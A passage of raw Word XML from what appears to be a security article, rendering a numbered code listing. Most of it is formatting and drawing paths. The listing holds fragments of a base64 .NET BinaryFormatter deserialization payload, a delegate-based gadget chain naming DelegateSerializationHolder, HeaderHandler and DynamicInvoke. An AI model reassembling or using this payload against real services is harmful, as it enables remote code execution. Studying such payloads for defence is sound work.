          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaX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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ph"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>37</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xk"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>38</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>kD"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYX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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rl"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZX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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RU"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>41</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZV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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Nl"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>90"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>43</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLj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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Au"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AH"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAw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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZX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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Qw"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group style="position:absolute;margin-left:523.631pt;margin-top:0.0pt;width:0.0pt;height:842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10472,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10472;top:0;width:0;height:16840" coordorigin="10472,0" coordsize="0,16840" path="m10472,0l10472,0,10472,0,10472,0,10472,0,10472,0,10472,1,10472,2,10472,3,10472,5,10472,7,10472,9,10472,13,10472,17,10472,21,10472,27,10472,33,10472,40,10472,49,10472,58,10472,68,10472,79,10472,92,10472,106,10472,121,10472,138,10472,156,10472,175,10472,196,10472,219,10472,243,10472,269,10472,297,10472,327,10472,359,10472,392,10472,428,10472,466,10472,506,10472,548,10472,592,10472,639,10472,688,10472,740,10472,794,10472,851,10472,910,10472,972,10472,1037,10472,1105,10472,1175,10472,1249,10472,1325,10472,1405,10472,1487,10472,1573,10472,1662,10472,1754,10472,1850,10472,1949,10472,2052,10472,2158,10472,2268,10472,2381,10472,2498,10472,2619,10472,2744,10472,2872,10472,3005,10472,3142,10472,3282,10472,3427,10472,3576,10472,3729,10472,3887,10472,4049,10472,4215,10472,4386,10472,4562,10472,4742,10472,4927,10472,5116,10472,5310,10472,5509,10472,5713,10472,5922,10472,6137,10472,6356,10472,6580,10472,6810,10472,7044,10472,7284,10472,7530,10472,7781,10472,8038,10472,8300,10472,8567,10472,8841,10472,9120,10472,9405,10472,9696,10472,9993,10472,10295,10472,10604,10472,10919,10472,11240,10472,11568,10472,11901,10472,12242,10472,12588,10472,12941,10472,13300,10472,13666,10472,14039,10472,14419,10472,14805,10472,15198,10472,15598,10472,16005,10472,16419,10472,16840e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:48.500pt;width:455.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,970" coordsize="9110,570">
        <v:shape style="position:absolute;left:1430;top:970;width:9110;height:570" coordorigin="1430,970" coordsize="9110,570" path="m1440,1000l1440,1000,1440,1000,1440,1000,1441,1000,1441,1000,1441,1000,1442,1000,1442,1000,1443,1000,1444,1000,1446,1000,1448,1000,1450,1000,1452,1000,1455,1000,1459,1000,1463,1000,1467,1000,1472,1000,1477,1000,1484,1000,1490,1000,1498,1000,1506,1000,1515,1000,1525,1000,1535,1000,1547,1000,1559,1000,1572,1000,1586,1000,1601,1000,1617,1000,1635,1000,1653,1000,1672,1000,1692,1000,1714,1000,1737,1000,1761,1000,1786,1000,1813,1000,1841,1000,1870,1000,1901,1000,1933,1000,1966,1000,2001,1000,2038,1000,2076,1000,2116,1000,2157,1000,2200,1000,2245,1000,2291,1000,2339,1000,2389,1000,2441,1000,2494,1000,2550,1000,2607,1000,2667,1000,2728,1000,2791,1000,2856,1000,2924,1000,2993,1000,3065,1000,3139,1000,3215,1000,3293,1000,3374,1000,3457,1000,3542,1000,3629,1000,3719,1000,3812,1000,3907,1000,4004,1000,4104,1000,4206,1000,4311,1000,4419,1000,4529,1000,4642,1000,4758,1000,4876,1000,4998,1000,5122,1000,5249,1000,5378,1000,5511,1000,5647,1000,5785,1000,5927,1000,6072,1000,6220,1000,6371,1000,6525,1000,6682,1000,6842,1000,7006,1000,7173,1000,7343,1000,7517,1000,7694,1000,7874,1000,8058,1000,8245,1000,8436,1000,8630,1000,8828,1000,9030,1000,9235,1000,9444,1000,9656,1000,9872,1000,10092,1000,10316,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1001,10543,1001,10543,1001,10543,1001,10543,1002,10543,1002,10543,1003,10543,1003,10543,1004,10543,1004,10543,1005,10543,1005,10543,1006,10543,1007,10543,1008,10543,1008,10543,1009,10543,1010,10543,1011,10543,1013,10543,1014,10543,1015,10543,1016,10543,1018,10543,1019,10543,1021,10543,1022,10543,1024,10543,1026,10543,1028,10543,1030,10543,1032,10543,1034,10543,1036,10543,1038,10543,1041,10543,1043,10543,1046,10543,1049,10543,1052,10543,1055,10543,1058,10543,1061,10543,1064,10543,1067,10543,1071,10543,1075,10543,1078,10543,1082,10543,1086,10543,1090,10543,1095,10543,1099,10543,1104,10543,1108,10543,1113,10543,1118,10543,1123,10543,1128,10543,1134,10543,1139,10543,1145,10543,1151,10543,1157,10543,1163,10543,1169,10543,1175,10543,1182,10543,1189,10543,1196,10543,1203,10543,1210,10543,1217,10543,1225,10543,1233,10543,1241,10543,1249,10543,1257,10543,1266,10543,1274,10543,1283,10543,1292,10543,1301,10543,1311,10543,1321,10543,1330,10543,1340,10543,1351,10543,1361,10543,1372,10543,1383,10543,1394,10543,1405,10543,1416,10543,1428,10543,1440,10543,1452,10543,1464,10543,1477,10543,1490,10543,1503,10543,1516,10543,1529,10543,1543,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10542,1557,10542,1557,10541,1557,10540,1557,10538,1557,10536,1557,10534,1557,10532,1557,10529,1557,10525,1557,10521,1557,10517,1557,10512,1557,10506,1557,10500,1557,10493,1557,10486,1557,10478,1557,10469,1557,10459,1557,10449,1557,10437,1557,10425,1557,10412,1557,10398,1557,10383,1557,10366,1557,10349,1557,10331,1557,10312,1557,10291,1557,10270,1557,10247,1557,10223,1557,10198,1557,10171,1557,10143,1557,10114,1557,10083,1557,10051,1557,10018,1557,9983,1557,9946,1557,9908,1557,9868,1557,9827,1557,9784,1557,9739,1557,9693,1557,9645,1557,9595,1557,9543,1557,9489,1557,9434,1557,9377,1557,9317,1557,9256,1557,9193,1557,9127,1557,9060,1557,8990,1557,8919,1557,8845,1557,8769,1557,8691,1557,8610,1557,8527,1557,8442,1557,8354,1557,8265,1557,8172,1557,8077,1557,7980,1557,7880,1557,7778,1557,7673,1557,7565,1557,7455,1557,7342,1557,7226,1557,7108,1557,6986,1557,6862,1557,6735,1557,6605,1557,6473,1557,6337,1557,6198,1557,6057,1557,5912,1557,5764,1557,5613,1557,5459,1557,5302,1557,5142,1557,4978,1557,4811,1557,4641,1557,4467,1557,4290,1557,4110,1557,3926,1557,3739,1557,3548,1557,3354,1557,3156,1557,2954,1557,2749,1557,2540,1557,2328,1557,2112,1557,1892,1557,1668,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1556,1440,1556,1440,1556,1440,1556,1440,1555,1440,1555,1440,1555,1440,1554,1440,1554,1440,1554,1440,1553,1440,1553,1440,1552,1440,1551,1440,1551,1440,1550,1440,1549,1440,1548,1440,1547,1440,1546,1440,1545,1440,1544,1440,1543,1440,1542,1440,1540,1440,1539,1440,1537,1440,1536,1440,1534,1440,1533,1440,1531,1440,1529,1440,1527,1440,1525,1440,1523,1440,1521,1440,1518,1440,1516,1440,1513,1440,1511,1440,1508,1440,1505,1440,1502,1440,1499,1440,1496,1440,1493,1440,1489,1440,1486,1440,1482,1440,1478,1440,1474,1440,1470,1440,1466,1440,1462,1440,1458,1440,1453,1440,1448,1440,1444,1440,1439,1440,1434,1440,1428,1440,1423,1440,1418,1440,1412,1440,1406,1440,1400,1440,1394,1440,1388,1440,1381,1440,1375,1440,1368,1440,1361,1440,1354,1440,1347,1440,1339,1440,1332,1440,1324,1440,1316,1440,1308,1440,1299,1440,1291,1440,1282,1440,1273,1440,1264,1440,1255,1440,1246,1440,1236,1440,1226,1440,1216,1440,1206,1440,1196,1440,1185,1440,1174,1440,1163,1440,1152,1440,1140,1440,1129,1440,1117,1440,1105,1440,1092,1440,1080,1440,1067,1440,1054,1440,1041,1440,1027,1440,1013,1440,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:49.500pt;width:1.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,990" coordsize="30,570">
        <v:shape style="position:absolute;left:1430;top:990;width:30;height:570" coordorigin="1430,990" coordsize="30,570" path="m1447,1000l1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1001,1447,1001,1447,1001,1447,1001,1447,1002,1447,1002,1447,1003,1447,1003,1447,1004,1447,1004,1447,1005,1447,1005,1447,1006,1447,1007,1447,1008,1447,1008,1447,1009,1447,1010,1447,1011,1447,1013,1447,1014,1447,1015,1447,1016,1447,1018,1447,1019,1447,1021,1447,1022,1447,1024,1447,1026,1447,1028,1447,1030,1447,1032,1447,1034,1447,1036,1447,1038,1447,1041,1447,1043,1447,1046,1447,1049,1447,1052,1447,1055,1447,1058,1447,1061,1447,1064,1447,1067,1447,1071,1447,1075,1447,1078,1447,1082,1447,1086,1447,1090,1447,1095,1447,1099,1447,1104,1447,1108,1447,1113,1447,1118,1447,1123,1447,1128,1447,1134,1447,1139,1447,1145,1447,1151,1447,1157,1447,1163,1447,1169,1447,1175,1447,1182,1447,1189,1447,1196,1447,1203,1447,1210,1447,1217,1447,1225,1447,1233,1447,1241,1447,1249,1447,1257,1447,1266,1447,1274,1447,1283,1447,1292,1447,1301,1447,1311,1447,1321,1447,1330,1447,1340,1447,1351,1447,1361,1447,1372,1447,1383,1447,1394,1447,1405,1447,1416,1447,1428,1447,1440,1447,1452,1447,1464,1447,1477,1447,1490,1447,1503,1447,1516,1447,1529,1447,1543,1447,1557e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:76.500pt;width:455.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,1530" coordsize="9110,570">
        <v:shape style="position:absolute;left:1430;top:1530;width:9110;height:570" coordorigin="1430,1530" coordsize="9110,570" path="m1440,1557l1440,1557,1440,1557,1440,1557,1441,1557,1441,1557,1441,1557,1442,1557,1442,1557,1443,1557,1444,1557,1446,1557,1448,1557,1450,1557,1452,1557,1455,1557,1459,1557,1463,1557,1467,1557,1472,1557,1477,1557,1484,1557,1490,1557,1498,1557,1506,1557,1515,1557,1525,1557,1535,1557,1547,1557,1559,1557,1572,1557,1586,1557,1601,1557,1617,1557,1635,1557,1653,1557,1672,1557,1692,1557,1714,1557,1737,1557,1761,1557,1786,1557,1813,1557,1841,1557,1870,1557,1901,1557,1933,1557,1966,1557,2001,1557,2038,1557,2076,1557,2116,1557,2157,1557,2200,1557,2245,1557,2291,1557,2339,1557,2389,1557,2441,1557,2494,1557,2550,1557,2607,1557,2667,1557,2728,1557,2791,1557,2856,1557,2924,1557,2993,1557,3065,1557,3139,1557,3215,1557,3293,1557,3374,1557,3457,1557,3542,1557,3629,1557,3719,1557,3812,1557,3907,1557,4004,1557,4104,1557,4206,1557,4311,1557,4419,1557,4529,1557,4642,1557,4758,1557,4876,1557,4998,1557,5122,1557,5249,1557,5378,1557,5511,1557,5647,1557,5785,1557,5927,1557,6072,1557,6220,1557,6371,1557,6525,1557,6682,1557,6842,1557,7006,1557,7173,1557,7343,1557,7517,1557,7694,1557,7874,1557,8058,1557,8245,1557,8436,1557,8630,1557,8828,1557,9030,1557,9235,1557,9444,1557,9656,1557,9872,1557,10092,1557,10316,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1558,10543,1558,10543,1558,10543,1558,10543,1558,10543,1558,10543,1559,10543,1559,10543,1559,10543,1560,10543,1560,10543,1561,10543,1561,10543,1562,10543,1562,10543,1563,10543,1563,10543,1564,10543,1565,10543,1566,10543,1567,10543,1568,10543,1569,10543,1570,10543,1571,10543,1572,10543,1573,10543,1575,10543,1576,10543,1578,10543,1579,10543,1581,10543,1583,10543,1585,10543,1587,10543,1589,10543,1591,10543,1593,10543,1595,10543,1597,10543,1600,10543,1603,10543,1605,10543,1608,10543,1611,10543,1614,10543,1617,10543,1620,10543,1623,10543,1627,10543,1630,10543,1634,10543,1638,10543,1642,10543,1646,10543,1650,10543,1654,10543,1659,10543,1663,10543,1668,10543,1673,10543,1678,10543,1683,10543,1688,10543,1693,10543,1699,10543,1705,10543,1710,10543,1716,10543,1723,10543,1729,10543,1735,10543,1742,10543,1749,10543,1756,10543,1763,10543,1770,10543,1777,10543,1785,10543,1793,10543,1801,10543,1809,10543,1817,10543,1826,10543,1834,10543,1843,10543,1852,10543,1861,10543,1871,10543,1880,10543,1890,10543,1900,10543,1910,10543,1921,10543,1931,10543,1942,10543,1953,10543,1964,10543,1976,10543,1987,10543,1999,10543,2011,10543,2023,10543,2036,10543,2049,10543,2062,10543,2075,10543,2088,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10542,2102,10542,2102,10541,2102,10540,2102,10538,2102,10536,2102,10534,2102,10532,2102,10529,2102,10525,2102,10521,2102,10517,2102,10512,2102,10506,2102,10500,2102,10493,2102,10486,2102,10478,2102,10469,2102,10459,2102,10449,2102,10437,2102,10425,2102,10412,2102,10398,2102,10383,2102,10366,2102,10349,2102,10331,2102,10312,2102,10291,2102,10270,2102,10247,2102,10223,2102,10198,2102,10171,2102,10143,2102,10114,2102,10083,2102,10051,2102,10018,2102,9983,2102,9946,2102,9908,2102,9868,2102,9827,2102,9784,2102,9739,2102,9693,2102,9645,2102,9595,2102,9543,2102,9489,2102,9434,2102,9377,2102,9317,2102,9256,2102,9193,2102,9127,2102,9060,2102,8990,2102,8919,2102,8845,2102,8769,2102,8691,2102,8610,2102,8527,2102,8442,2102,8354,2102,8265,2102,8172,2102,8077,2102,7980,2102,7880,2102,7778,2102,7673,2102,7565,2102,7455,2102,7342,2102,7226,2102,7108,2102,6986,2102,6862,2102,6735,2102,6605,2102,6473,2102,6337,2102,6198,2102,6057,2102,5912,2102,5764,2102,5613,2102,5459,2102,5302,2102,5142,2102,4978,2102,4811,2102,4641,2102,4467,2102,4290,2102,4110,2102,3926,2102,3739,2102,3548,2102,3354,2102,3156